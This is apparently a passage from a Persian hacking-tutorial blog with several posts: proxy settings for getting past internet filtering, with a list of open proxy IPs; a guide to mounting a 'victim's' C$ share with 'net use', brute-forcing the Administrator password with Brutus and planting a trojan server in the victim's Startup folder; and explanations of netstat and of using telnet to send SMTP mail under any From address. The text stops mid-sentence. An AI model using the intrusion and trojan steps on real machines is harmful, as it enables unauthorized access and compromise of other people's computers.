برای عبور از فیلتر راه های بسیار زیادی وجود دارد.ساده ترین و آسان ترین راه این است که اینترنت اکسپلورر یا مرور گر خود را طوری تنظیم کنید که از فیلتر رد بشود و از پروکسی سرور استفاده کند.

برای تنظیم اینترنت اکسپلورر برای عبور از فیلتر اول به منوی Tools در اینترنت اکسپلورر بروید.در این منو گزینه Internet Options  را انتخاب کنید.بعد از باز شدن پنجره Internet Options بر روی برگه Connections  بروید.در این برگه اسم ISP خود را انتخاب کنید و بر روی دکمه Settings...  کلیک کنید.

در صفحه باز شده تیک گزینه Use Proxy Server ...  را بزنید.همانطور که میبینید در این قسمت باید دو گزینه Address و Port  را پر کنید.بعد از اینکه Address و  Port را نوشتید بر روی دکمه OK کلیک کنید و از صفحه خارج بشوید.حالا صفحه ای را که قبلاً فیلتر شده بود دوباره امتحان کنید و صفحه را Refresh کنید.می بینید که فیلتر برداشته شده است

اگر این Address و Port کار نکرد، سعی کنید Address های دیگر را امتحان کنید.اگر نمی خواهید سایت های فیلتر شده را ببینید حتماً فیلتر خود را حذف کنید.(چون ضد فیلتر ها سرعت اینترنت را کم می کنند.)برای حذف کردن فیلتر تیک گزینه Use a Proxy  را بردارید.

این روش وارد کردن Address , Port  بود.مساله اصلی این است که این آدرس ها را از کجا بدست بیاوریم.

برای بدست آوردن آدرس ها می توانید از سایت http://www.samair.ru/proxy استفاده کنید.لیستی که از طرف این سایت معرفی می شود دارای آپدیت ساعتی هست و هر ساعت این لیست به روز می شود.نکته مهمی که با مورد توجه قرار بدهید این است که از ادرس هایی استفاده کنید که anonymous هستند.همچنین از پورت های 80 نیز استفاده نکنید.چون در غیر این صورت نمی توانید از فیلتر عبور کنید.

این لیستی است که مربوط به 2۳ مهر 1383 است.همانطور که در این لیست می بینید نوع و کشور ارائه کننده پروکسی نیز نوشته شده است.

مثلاً در مورد اول  81.22.90.226 آدرس و 8080 پورت مورد استفاده است.نوع این پروکسی  anonymous است یعنی کاملاً رایگان و مناسب برای عبور از فیلتر است.در قسمت آخر هم کشور نوشته شده است.پیشنهاد من این است که از پروکسی های آمریکایی استفاده کنید.چون سرعت بیشتری دارند.

باز هم میگویم که برای نتیجه بهتر حتماً از آدرس های با نوع anonymous استفاده کنید و از پورت 80 نیز استفاده نکنید.

این تنها لیست نمایشی است و برای گرفتن لیست کامل که شامل 20 صفحه است و به روز نیز می باشد، از سایت http://www.samair.ru/proxy استفاده کنید.

81.22.90.226:8080     anonymous        Algeria
193.194.79.194:8080   anonymous        Algeria
200.47.212.179:6588   elite proxy SSL  Argentina
200.80.220.100:3128   elite proxy SSL  Argentina
200.47.80.114:3128    anonymous   SSL  Argentina
200.47.80.110:3128    anonymous   SSL  Argentina
200.68.102.61:80      anonymous        Argentina
200.69.192.49:8000    anonymous        Argentina
200.89.165.151:6588   elite proxy SSL  Argentina
24.232.71.243:80      elite proxy      Argentina
24.232.241.94:80      elite proxy      Argentina
200.43.240.5:3128     anonymous        Argentina
200.43.240.11:3128    anonymous        Argentina
200.45.71.40:80       anonymous        Argentina
200.43.63.232:80      anonymous        Argentina
200.43.240.12:3128    anonymous        Argentina
200.43.240.4:3128     anonymous        Argentina
200.45.71.52:8000     anonymous        Argentina
203.101.108.131:3128  elite proxy SSL  Australia
203.101.85.115:8080   elite proxy      Australia
61.95.221.81:80       elite proxy      Australia
203.101.93.172:80     elite proxy      Australia
210.87.135.125:80     elite proxy      Australia
220.246.21.97:8080    anonymous        Australia
61.95.205.231:8080    anonymous        Australia
218.185.68.130:80     anonymous        Australia
210.0.71.246:80       anonymous        Australia
80.240.229.100:80     elite proxy      Austria
62.99.138.162:80      anonymous        Austria
213.33.64.68:3128     anonymous        Austria
193.171.120.85:80     elite proxy      Austria
83.64.161.34:8080     anonymous        Austria
212.41.228.5:8000     anonymous        Austria
203.190.254.9:80      elite proxy      Bangladesh
193.121.103.18:6588   elite proxy SSL  Belgium
213.118.120.54:8080   anonymous        Belgium
195.222.54.242:8080   elite proxy SSL  Bosnia
200.208.68.130:6588   elite proxy SSL  Brazil
200.255.233.118:6588  elite proxy SSL  Brazil
200.166.204.92:6588   elite proxy SSL  Brazil
150.164.108.148:3382  elite proxy SSL  Brazil
150.164.108.152:3382  elite proxy SSL  Brazil
200.233.67.141:6588   elite proxy SSL  Brazil
200.253.62.187:3128   elite proxy SSL  Brazil
200.165.167.130:6588  elite proxy SSL  Brazil
200.242.61.24:80      elite proxy      Brazil
200.198.105.132:80    anonymous        Brazil
200.140.112.122:80    anonymous        Brazil
200.243.8.162:80      anonymous        Brazil
200.162.72.132:8080   anonymous        Brazil
200.249.70.130:80     anonymous        Brazil
200.162.72.131:8080   anonymous        Brazil
200.246.20.2:80       anonymous        Brazil
200.199.82.195:8080   anonymous        Brazil
200.183.104.5:80      anonymous        Brazil
200.217.216.94:80     anonymous        Brazil
200.183.227.131:8080  anonymous        Brazil
200.162.114.206:8080  anonymous        Brazil
200.168.8.62:8080     elite proxy SSL  Brazil
200.168.83.239:8080   elite proxy SSL  Brazil
201.0.51.170:8080     elite proxy SSL  Brazil
200.171.65.135:6588   elite proxy SSL  Brazil
200.204.123.184:80    elite proxy SSL  Brazi

نظر یادتون نره و سایت بالایی پروکسی شده و دیگه باید از پروکسی ها دست بکشیم و دوستی تو آی آس پی پیدا کنیم.

+ نوشته شده در  شنبه چهارم شهریور 1385ساعت 23:46  توسط Reza  | 

اموزش شیر کردن هارد در سیستم قربانی

 یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... )
خب بریم سره موضوع اصلی:

اول باید IP سیستم مورد نظر رو پیدا کنید ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:

Net use x: \IPDriveName$

به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:

Net use x: \80.191.191.39c$

اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.

اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید )

موفق باشید.
+ نوشته شده در  دوشنبه سی ام مرداد 1385ساعت 10:22  توسط Reza  | 

آشنايي با Netstat - آشنايي با TelNet

آشنايي با Netstat

اين دستور که با سويچ هاي ديگري هم استفاده ميشه يکي از دستورايي هست که همه هکر ها اول باهاش آشنا ميشن.که با تايپ اين دستور شما متوجه آي پي سيستمها و پورتهايي که با آنها در ارتباط هستيد ميشويد و مشاهده ميکنيد که چه پورتهايي Listening و يا Established هستن اين باعث ميشود اگر پورتي مخصوص يک تروجن مثل 27374 که پورت اصلي Sub7 هست در سيستم شما باز بود شما متوجه اين پورت باز بروي سيستمتان بشويد. اگر در قسمت Foreign Address هم يک آي پي بوسيله پورتي به سيستم شما وصل بود شما به سرعت متوجه مي شويد که يک نفر با آن آيپي در سيستم شماست ، پس اين راهيست که متوجه گرديد سيستمتان آسيب پذير است يا نه ، براي مثال من با تايپ دستور Netstat در Ms-Dos پس از اتصال به اينتر نت نتايج زير را گرفتم : C:\WINDOWS>netstat Active Connections Proto Local Address Foreign Address State TCP Midia:1454 cs33.msg.sc5.yahoo.com:5050 ESTABLISHED TCP Midia:1488 63.123.44.222:80 ESTABLISHED TCP Midia:1491 opi1.vip.sc5.yahoo.com:80 TIME_WAIُT TCP Midia:1497 64.187.54.23:80 ESTABLISHED TCP Midia:1498 64.187.54.23:80 ESTABLISHED همانطور که ملاحظه ميکنيد اين دستور گاهي اوقات اسم صاحب سيستم کلاينتي که شما با آن در ارتباط هستيد را نيز ميدهد و چون اينجا من با کسي در PM نبودم اسم کسي را نميبينيد ولي اگر کسي با من چت کند و دستور Netstat را اجرا كند اسم را ميبيند و متوجه ميشود کهMidia صاحب آن سيستم کلاينتي مي باشدکه در حال چت كردن با آن است و همچنين در اين قسمت مشخص است که من با پورت 5050 با ياهو مسنجر ارتباط برقرار کرده ام و نيز نتايجي که در زير Local Address مشخص است اطلاعاتي درباره خود من مي باشد . و نتايجي که در Foreign Address بدست مياد مشخص ميکند که ما با چه سرور يا کلاينتي در ارتباط هستيم . که در سطر پنجم مثال بالا يعني 63.123.44.222:80 آيپي سايت ياهو ميباشد و مشخص ميكند كه من در سايت ياهو بوده و به وسيله پورت 80 که پورت Http ميباشد با اين وب سرور ارتباط برقرار کرده ام و در قسمت Status هم مشخص ميشود که شما با چه پورتهايي Established هستيد يعني ارتباط برقرار کرده و وصل هستيد و چه پورتهايي Listening يا منتظر Request و در حال شنيدن مي باشيد ، بنابراين با دستور Netstat مي شود يک عمل مانيتورينگ از تمام آيپي ها - پورتها و ماشينهايي که شما با آنها در ارتباط هستيد گرفت . دستور Netstat/? : Help برنامه Netstat را معرفي ميکند و سويچ هاي که ازش ميتوان استفاده کرد و در مقابل هر سويچ در مورد کار آن توضيح مختصري ميدهد. دستور Netstat -n : با اين دستور ميتوان آيپي و پورت سيستمي که شما با آن در ارتباط هستيد را بدست آورد . براي مثال وقتي شما با يک نفر در ياهو مسنجر چت ميکنيد پورت ۵۰۵۰ روي سيستم open هست چون ياهو از پورت ۵۰۵۰ استفاده ميکند پس با تايپ netstat -n خواهيد داشت: Active Connections Proto Local Address Foreign Address State TCP 217.219.223.21:1425 216.136.175.226:5050 TIME_WAIT TCP 217.219.223.21:1431 64.242.248.15:80 ESTABLISHED TCP 217.219.223.21:1437 217.219.223.38:5101 ESTABLISHED همانطور که ملاحظه ميکنيد من در اين لحظه با آيپي 217.219.223.38 در حال چت کردن بودم که اشتراکش هم از رايان روش بوده (مثل خودم)و آي پي خود نيز پروتکلي که ما بوسيله آن با يک سيستم ارتباط برقرار کرديم Proto مشخص ميشود در قسمت Local Address من هم TCPارتباط برقرار شده است. دستور Netstat -na : با تايپ کردن اين دستور در MS-DOS Prompt تمام پورتهايي که داده ها و بسته ها را ميفرستند مشخص ميشود ، نشان " na " در تمام دستورات به معني نمايش همه پورتها و ليست کردن آدرسهاي شبکه و شماره فرمها در يک قالب عددي مي باشد ، براي مثال من با تايپ اين فرمان در MS-DOS اين نتايج را گرفتم : C:\WINDOWS>netstat -na Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:1954 0.0.0.0:0 LISTENING TCP 0.0.0.0:5101 0.0.0.0:0 LISTENING TCP 217.219.223.21:1954 207.46.106.21:1863 ESTABLISHED TCP 217.219.223.21:1971 216.136.225.36:5050 ESTABLISHED TCP 217.219.223.21:2031 63.121.106.74:80 TIME_WAIT TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING *:* UDP 0.0.0.0:1958 *:* UDP 64.110.148.59:9 *:* UDP 64.110.148.59:137 *:* UDP 64.110.148.59:138 خب ميبينيد که پورتهاي باز روي سيستم من ليست شده است. مثل 1954-1971-2031 دستور Netstat -a : اين دستور نيز مثل دستور Netstat -an يا -na عمل ميکنه فقط فرقش در اينه که اين دستور پورتها را با معادل اسميشان نشان ميدهد ، براي مثال پورت 139 را با معادل اسميش يعني Netbios نشان ميدهد و همچنين مانند دستور Netstat اسم صاحب سيستم را پرينت ميكند .(اين دستور براي تست کردن نقطه ضعفها و پورتهاي باز در سيستم هاي خودمان بسيار مفيد ميباشد و اگر سيستم آلوده به تروجن بود ميشود از اين دستورها و کلاً برنامه Netstat اين موضوع را فهميد ، پس آنهايي که سوال ميکنند ما چگونه بفهميم سيستم خودمان آلوده به تروجن هست يا نه ، استفاده از اين دستور و کلاً دستورات Netstat ميتواند خيلي به آنها کمک کند ) دستور Netstat -p xxx : منظور از xxx يعني آن پروتکلي که شما در نظر داريد که ميتواند TCP و UDP باشد. دستور Netstat -e : اين دستور نيز يکي از دستورات Netstat است که آماري از ارتباطها و بسته ها و شماره هاي ارسال و ذخيره بسته ها و داده ها را نشان ميدهد .(اين دستور بيشتر براي ويندوزهاي 98 , me و همينطور مودمهايي که آمار بسته ها را نميدهند خوب و مفيد است چون در ويندوز 2000 – XP- قسمتي از اين آمار براحتي در اختيار User قرار ميگيرد ، و شما ميتونيد با استفاده از اين دستور ترافيک ISP و شبکه را ببينيد و همينطور برنامه هايي که در حال دانلود هستسد را چک کنيد و يا اگر بسته اي در ارسالش مشکلي پيش بياد ميتوانيد در قسمت Errors مشاهده کنيد ، ...) دستور Netstat -r : اين دستور توسط کاربران معمولي اينترنت زياد بکار گرفته نميشود چون درک بعضي از گزينه هاش براي کاربران عادي دشوار ، بحرحال اين دستور جزييات دقيقي مثل آدرس Gateway - Interface Metric -Netmask , ... درباره آدرس آي پي شما در شبکه ميدهد ، همچنين در ويندوزهاي8 9 - ME کار دستور Netstat -a را هم انجام ميدهد .





آشنايي با TelNet

Telnet در اصل پروتکلي است که براي login و استفاده از يک کامپيوتر ديگر به کار مي رود. روش اجراي Telnet در لينوکس يا انواع ديگر Unix و نيز ويندوز 2000 تا حد خيلي زيادي شبيه چيزي است که ما گفتيم. براي آشنايي بيشتر با telnet و گرفتن جواب دقيقتر سوالات بالا روي مـــن کليک کنيد که به يک ميزبان واقعي Telnet شما را متصل مي کند که مي توانيد به رايگان عضو شويد و از خدمات آن استفاده کنيد. خواهيد ديد که لينک فوق در حقيقت Hyper Terminal را باز مي کند. در حقيقت هم اگر به درون Hyper Terminal برويد مي توانيد در قسمت برقراري تماس با انتخاب TCP/IP مستقيما از آن به عنوان Telnet استفاده کنيد. اما اينکه Telnet در هک چه نقشي داره و چه فايده اي داره کلاً رو از زبان "کارولين مينل" برايتان مي نويسم: "فقط با يک سرويسگير Telnet [مثل همين Telnet خودمون در ويندوز] شما مي توانيد: · ايميل بفرستيد. · سورس (متن برنامه) سايتها را بخوانيد. · به ميزبانهاي وب وروديهاي غير منتظره بفرستيد که مي تواند سبب دريافت پاسخهاي شگفت انگيز و گاهي غير قانوني شود. · به بسياري از ديگر سرويسهاي کامپيوترهاي ميزبان وب ورودي دلخواه خود را بدهيد. · در سرويسهايي که ميزبانها، روترها و حتي کامپيوترهاي شخصي مردم در منزلشان در اختيار شما مي گذارند کاوش و جستجو کنيد." تلنت کردن معمولا اولين کاري است که يک هکر براي هک کردن يک سايت انجام ميدهد، زيرا بعضي از پورتها در صورت بسته نبودن روي آن سرور، معمولا حاوي اطلاعات بسيار مهمي هستند.(به همين دليل ما بايد اول پورتها رو چک کنيم بعد telnet چون اگر پورتي که ما بهش telnet ميکنيم close باشه دستور اجرا نميشه) موضوع مهمي كه يك نفوذ گر واقعي به آن توجه مي كند در سه اصل خلاصه شده است : ۱- او هيچگاه سعي در استفاده از برنامه هايي كه ديگران نوشته اند نمي كند ... »البته ممكن است تعدادي از هكر ها باشند كه با استفاده از تروجان ها يا Back doors ها به اين كار بيپردازند و فقط خود را با اين مباحث ساده درگير کنند. 2- معمولا از به كارگيري برنامه هاي گرافيكي كه حتي خود طراحي كرده اند نفرت دارند و فقط در دنياي سياه و سفيد msdos-prompt براي خود حكومت تشكيل ميدهند.(در اصل از استفاده نرم افزار براي هک نفرت دارند) 3- موضوع سوم و اساسي اين است كه فقط يك چيز را در دنيا ميشناسند و آن هم تايپ كردن است.تايپ در صفحه سياه و سفيد command prompt . در ويندوز XP، يکي از بهترين ابزارهايي که در دست شماست، همان صفحه مشکي Command prompt است. در ويندوز XP دو نوع DOS وجود دارد. يکي cmd.exe و ديگري command.com که cmd.exe براي کارهاي ما مناسبتر است و کليک روي دگمه Start و انتخاب All programs و انتخاب Accessories و سپس کليک روي Command prompt نيز همين را باز خواهد کرد. (راه مناسبتر: دگمه ويندوز کيبورد را به همراه حرف R فشار دهيد، تايپ کنيد cmd و Enter کيبورد را فشار دهيد). تايپ کردن Help و فشردن Enter ليستي از دستورات را براي شما به نمايش در مي آورد که متاسفانه دستورهاي مناسب براي هک را از قلم انداخته است. (ناگفته نماند که Help ويندوزXP اگر بدانيد که در کجاي آن به دنبال چه بگرديد نسبتاً کامل است). از جمله مهمترين اين دستورها مي توان به دستورات زير اشاره کرد: TCP/IP command: telnet, netstat, nslookup, tracert, ping, ftp NetBIOS commands: nbtstat, net use, net view, net localgroup (و چند دستور ديگر) در اين شماره، براي اينکه هم کمي با telnet (که به عنوان يکي از مهمترين ابزارهاي هک مطرح بوده و هست) آشنا شويد هم از موضوعي شروع کرده باشيم که ملموس و جذاب باشد، فرستادن ايميل از طرف هرکسي به هرکسي با telnet را آموزش مي دهيم (من هم مي دونم که راههاي آسونتري براي اين کار هست و راحتترين راهش استفاده از Outlook مايکروسافت است، اما مطمئنم از ديدن پشت صحنه نمايش فرستادن ايميل لذت خواهيد برد). قبل از هر چيز بگم که telnet کردن به خودي خود جرم نيست و استفاده از telnet براي فرستادن يا گرفتن ايميل نه ضرري براي شما دارد و نه ميزبان. اما شما اين حق را نداريد که از طرف کسي به کس ديگر ايميل بزنيد مگر با اجازه آنها.اول وارد صفحه سياه خط فرمان شويد (مراحل نوشته شده در بالا)، حالا مي خواهيم از دستور telnet استفاده کنيم: telnet target port به جاي target آدرس سايت يا کامپيوتر و به جاي port بايد آدرس پورت را وارد کنيد. در مثال اين شماره با فرستادن ايميل (smtp) سروکار داريم که پورت آن 25 است و آدرس نيز آدرس يک سرور ايميل بايد باشد. به عنوان مثال telnet mail.hamsafar.com 25 را خواهيم داشت. همسفر، وب سايت من که عضويت در آن را به شما توصيه مي کنم، فقط يک مثال است و شما مي توانيد از هر آدرس مشابهي استفاده کنيد. جوابي دريافت خواهيد کرد که معمولا شامل نام ميزبان ايميل است. حالا وقت سلام کردن با دستور helo است (دستور ehlo هم داريم که مي توانيد امتحانش کنيد). بهتر است جلوي helo آدرس ايميل فرستنده را درج نماييد. با گرفتن جواب سلام، براي فرستادن ايميل از دستور mail استفاده مي کنيم:mail from
leyli@masalan-ye-sity.com بعد از گرفتن OK حالا گيرنده را معرفي مي کنيم: rcpt to: majnoon@hamsafar.com اين بار بعد از گرفتن OK دستور data را تايپ و Enter کنيد. توجه کنيد که ميزبان به شما مي گويد وقتي کارتان تمام شد . بزنيد که اين يعني زدن يک Enter، تايپ کردن يک نقطه و دوباره زدن Enter. حالا وقت وارد کردن Subject، to و from و سپس زدن دو Enter و وارد کردن متن ايميل و سپس زدن Enter، تايپ کردن نقطه و زدن Enter دوم است. در عکس بالا فقط Subject وارد شده است. نمونه کاملتري که شامل To و From مي باشد به صورت زير است: data 354 ok, send it; end with . From: Leyli@masalan-ye-sity.com To: Majnoon@hamsafar.com Subject: Salam! In email faghat be ghasde azmayesh ferestade shode ast. Rooze khooby dashte bashid . 250 Message queued به تفاوت اين دو مورد در عکس زير توجه کنيد: توجه کنيد که همسفر فقط به شما اجازه خواهد داد به آدرسهايي که به hamsafar.com ختم مي شوند ايميل بزنيد. اگر تمايل به خريد ايميل روي همسفر (webmail & pop3) را داريد، با ما به آدرس sales@hamsafar.com مکاتبه کنيد. اما دستوراتي که گفته شد روي هر ميزباني کار خواهد کرد. به احتمال زياد جايي که از آن اينترنت گرفته ايد اگر درخواست ايميل POP3 از آنها بکنيد به رايگان به شما خواهند داد و شما آدرسي که به عنوان SMTP يا Outgoing server از آنها دريافت مي کنيد را به جاي mail.hamsafar.com خواهيد نوشت. در هر صورت شما اين اجازه را داريد که با روش فوق با من به آدرس ehssanr@hamsafar.com مکاتبه کنيد و به اين شکل روش را آزمايش کنيد. به ياري خدا در شماره آينده با آموزش نحوه نصب و استفاده از ميزبان SMTP خود ويندوز XP، خواهيد آموخت که چگونه بي نياز از هر SMTP ايميل بفرستيد. حالا که به اينجا رسيديم اميدوارم اين سه سوال براي شما پيش آمده باشد که اگر جوابشان را هم مي دانستيد که هيچ وگرنه ما به آنها جواب مختصر و مفيد خواهيم داد. اگر هم هيچ سوالي برايتان پيش نيامده اين قسمت را باز هم به دقت بخوانيد چرا که مهمترين مفاهيم را به سادگي توضيح داده ايم. باز هم تاکيد مي کنم که اين سه سوال و پاسخ آنها را با دقت بخوانيد و بفهميد. چند نکته مهم : سوال : اسم Target که در قالب Telnet target port مطرح کرديم چيست و چرا برخي به جاي آن 4 تا عدد مي زنند؟ پاسخ: هر کامپيوتر روي اينترنت با 4 عدد بين 0 تا 255 که با نقطه از هم جدا مي شوند مشخص مي شود. در XP براي فهميدن IP خود کافي است که روي مانيتورهاي نشاندهنده اتصال شما به اينترنت دابل کليک کنيد و از بالاي پنجره ظاهر شده با انتخاب قسمت جزئيات (Details) آدرس IP خود را خواهيد ديد.(براي کساني که ويندوز قديمي دارند معمولا يک راه مناسب تايپ کردن winipcfg در پنجره Run و فشردن Enter است). حال وقتي که کسي يک Domain ثبت مي کند، در واقع روي اين عددها يک اسم مي گذارد. اين کار دو فايده اساسي دارد. يکي اينکه اگر عدد فرد به هر دليل عوض شود لازم نيست دوباره به همه خبر دهد و دليل ديگر آن اين است که اسم ساده تر به خاطر سپرده مي شود و احتمال اشتباه در آن کمتر است. همانطور که مي بينيد تشبيه IP به شماره تلفن تا حدي به فهم آن کمک خواهد کرد. در اينجا قصد نداريم وارد بحث دقيق IP بشويم اما دو عدد اول IP حتما به اينکه از کجا اينترنت داريد مربوط است و به طور تئوري با داشتن IP شما مي توان مکان شما را به صورت فيزيکي هم در روي کره زمين مشخص کرد. براي دانستن IP يک سايت کافي است که از داخل Command Prompt، دستور Ping را اجرا کنيد. به سادگي تايپ کنيد Ping yahoo.com يا Ping hamsafar.com تا IP را ببينيد. پس حالا ديديد که در واقع منظور از Target شماره آن کامپيوتري است که قصد داريد به آن متصل شويد. (مفهوم Port و کمي از پروتکل Telnet سوال : اصطلاح port که در قالب Telnet target port مطرح کرديم چيست و چرا ما آنرا برابر 25 گرفتيم؟ اگر جاي آن را خالي بگذاريم چه مي شود؟ ترجمه کلمه port به فارسي "بندر" مي شود. کامپيوتر مقصد را به صورت جزيره اي تصور کنيد که چندين بندر دارد و هرکدام تخصص خاص خود را دارند. يکي براي نفتکشهاست يکي براي صادرات سنگ معدن و... . Port روي کامپيوتر هم در حقيقت همچين مفهومي داره. Port کامپيوتر جايي است که اطلاعات مي توانند از آن خارج يا به آن وارد شوند. کيبورد، پرينتر، نمايشگر و مودم از پورتهايي هستند که به راحتي از آنها درک فيزيکي داريد اما پورتهاي مجازي توسط نرم افزار ايجاد مي شوند. وقتي پورت مودم شما به اينترنت متصل مي شود، کامپيوتر شما مي تواند هر کدام از پورتها را که تعدادشان بيش از 65000 عدد است ببندد يا باز بگذارد و نيز مي تواند به هر کدام از اين پورتهاي يک کامپيوتر ديگر متصل شود (البته در صورتي که آن کامپيوتر بر روي اين پورت چيزي در حال اجرا داشته باشد و نيز ديوارآتش (firewall) آن را نبسته باشد. (در ويندوز XP هنگامي که اينترنت خود را تنظيم مي کنيد اين امکان را به شما مي دهد که با استفاده از ديوار آتش جلوي نفوذ ديگران به شما را بگيرد که به طور پيش فرض خودش آنرا فعال مي کند). پورتهاي خاص کاربردهاي خاص دارند. پورت 25 معمولا براي SMTP (مخفف Simple mail transfer protocol ) است و ما براي ارسال ايميل از آن استفاده کرديم. اگر قصد دريافت ايميلهايمان را داشتيم به چورت 110 سر مي زديم، براي مشاهده صفحات وب به سراغ پورت 80 مي رويم و... (درست حدس زديد! Outlook هم به طور پيش فرض براي ارسال ايميل از پورت 25 و براي دريافت آن از پورت 110 استفاده مي کند و اينترنت اکسپلورر هم به پورت 80 شماره IP آدرس سايتي که مي نويسيد سر مي زند.) و در پايان اگر پورت را ننويسيد، پورت برابر 23 فرض مي شود که پورت Telnet است. به پاسخ سوال اول دوباره سر بزنيد. وقتي روي لينکي که داده ام کليک مي کنيد در حقيقت به پورت 23 آن ميزبان متصل مي شويد. امروزه بسياري از سايتها بخصوص سايتهايي که از ميزباني ويندوزي استفاده مي کنند سرويس Telnet ندارند و امکان اتصال به پورت 23 وجود ندارد اما من باز هم توصيه مي کنم که براي تجربه Shell Account هم که شده Telnet واقعي را تجربه کنيد. اين Telnet در حقيقت معمولا يک BBS هم هست اما امکانات بسيار زيادي هم براي يک هکر دارد. براي آشنايي اوليه صرف اينکه کمي انگليسي بفهميد و هرموقع گير کرديد تايپ کنيد Help و Enter کنيد بايد کافي باشد. سوال :آدرس مورد استفاده در Telnet براي سايتهاي مختلف را چگونه پيدا کنيم؟ پاسخ:اگرچه بسياري از سايتها از همان mail.domain-name.com استفاده مي کنند، اين امر همه گير نيست. در ويندوز و با استفاده از cmd.exe خودمان به راحتي مي توانيم اين آدرس را براي 99% دومينها تعيين کنيم. پس از اجراي cmd، دستور nslookup را با تايپ کردن اين کلمه و فشردن Enter اجرا کنيد. از آنجايي که ما قصد گرفتن اطلاعات در مورد سامانه دريافت ايميل آن سايت را داريم، از کد mx که مخفف mail exchanger است استفاده مي کنيم. به طور کلي اطلاعات يک domain شامل چند قسمت است که براي مورد ما فقط اين اطلاعات مورد نياز است. پس تايپ کنيد set q=mx و Enter را فشار دهيد. حال کافي است نام domain را تايپ و Enter کنيد. در برخي موارد مانند مثال زير فقط يک جواب مي گيريد: > irib.com Server: UnKnown Address: 213.165.123.1 irib.com MX preference = 60, mail exchanger = mail.irib.com mail.irib.com internet address = 62.220.119.60 و يا مثال زير: irna.com MX preference = 10, mail exchanger = irna.com irna.com nameserver = ns1.gpg.com irna.com nameserver = ns1.irna.net irna.com nameserver = ns1.simorgh.com irna.com nameserver = ns2.irna.net irna.com internet address = 209.1.163.101 ns1.irna.net internet address = 217.25.48.18 ns1.irna.net internet address = 194.126.61.8 ns2.irna.net internet address = 194.126.61.7 ns2.irna.net internet address = 217.25.48.17 که نشان مي دهد براي آدرس irib.com بايد از mail.irdir.com استفاده کرد و براي آدرس irna.com بايد از irna.com استفاده کرد. به قسمت قرمز رنگ دقت کنيد. هميشه پاسخ مورد نظر ما بعد از عبارت mail exchanger قرار مي گيرد. گاهي تعداد جوابها بيشتر است: hamsafar.com MX preference = 10, mail exchanger = mail.hamsafar.com hamsafar.com MX preference = 15, mail exchanger = hamsafar.com mail.hamsafar.com internet address = 38.118.143.98 hamsafar.com internet address = 38.118.143.98 و يا مثال زير: hotmail.com MX preference = 5, mail exchanger = mx4.hotmail.com hotmail.com MX preference = 5, mail exchanger = mx1.hotmail.com hotmail.com MX preference = 5, mail exchanger = mx2.hotmail.com hotmail.com MX preference = 5, mail exchanger = mx3.hotmail.com hotmail.com nameserver = ns1.hotmail.com hotmail.com nameserver = ns2.hotmail.com hotmail.com nameserver = ns3.hotmail.com hotmail.com nameserver = ns4.hotmail.com mx4.hotmail.com internet address = 65.54.254.151 mx4.hotmail.com internet address = 65.54.253.230 mx1.hotmail.com internet address = 65.54.254.129 mx1.hotmail.com internet address = 65.54.252.99 mx1.hotmail.com internet address = 65.54.166.99 mx2.hotmail.com internet address = 65.54.254.145 mx2.hotmail.com internet address = 65.54.252.230 mx2.hotmail.com internet address = 65.54.166.230 mx3.hotmail.com internet address = 65.54.254.140 mx3.hotmail.com internet address = 65.54.253.99 ns1.hotmail.com internet address = 216.200.206.140 ns2.hotmail.com internet address = 216.200.206.139 ns3.hotmail.com internet address = 209.185.130.68 ns4.hotmail.com internet address = 64.4.29.24 و يا مثال زير: cnn.com MX preference = 10, mail exchanger = atlmail4.turner.com cnn.com MX preference = 20, mail exchanger = atlmail2.turner.com cnn.com MX preference = 30, mail exchanger = nymail1.turner.com cnn.com MX preference = 10, mail exchanger = atlmail1.turner.com cnn.com nameserver = twdns-04.ns.aol.com cnn.com nameserver = twdns-01.ns.aol.com cnn.com nameserver = twdns-02.ns.aol.com cnn.com nameserver = twdns-03.ns.aol.com atlmail1.turner.com internet address = 64.236.240.146 atlmail4.turner.com internet address = 64.236.221.5 atlmail2.turner.com internet address = 64.236.240.147 nymail1.turner.com internet address = 64.236.180.95 اگر کمي دقت کنيد، قسمت MX preference همواره داراي يک عدد است. اگر جوابهاي متفاوتي پيدا شد، جوابي که عدد MX preference آن کمتر باشد به طور معمول انتخاب مناسبتري است و بايد اولين جوابي باشد که امتحان مي کنيد. با اين روش شما مي توانيد بدون استفاده از SMTP خاصي ايميلهاي خود را ارسال کنيد يا برنامه اي بنويسيد که ايميل ارسال کند. سوالي که در اينجا پيش مي آيد اين است که چه کارهايي در اين زمينه مجاز و چه کارهايي غيرقانوني است. فرستادن ايميل به هزاران نفر طوري که به هر کدام فقط يک ايميل برسد و آنها راهي براي خروج از ليست شما داشته باشند غيرقانوني نيست اما ممکن است ISP يا Host شما را عصباني کند، بنابراين بهتر است از آنها سوال کنيد يا حداقل مطمئن باشيد که در قراردادي که با آنها امضا کرده ايد ممنوعيت اين مورد ذکر نشده باشد. البته اگر اين ايميل طوري فرستاده شود که فرستنده آن صحيح نباشد و به نظر برسد که از طرف کس ديگري آمده است قابل پيگرد قانوني است و افراد زيادي در دنيا به اين دليل محاکمه شده اند. فرستادن چندين ايميل به يک فرد طوري که سبب مزاحمت وي يا از دست 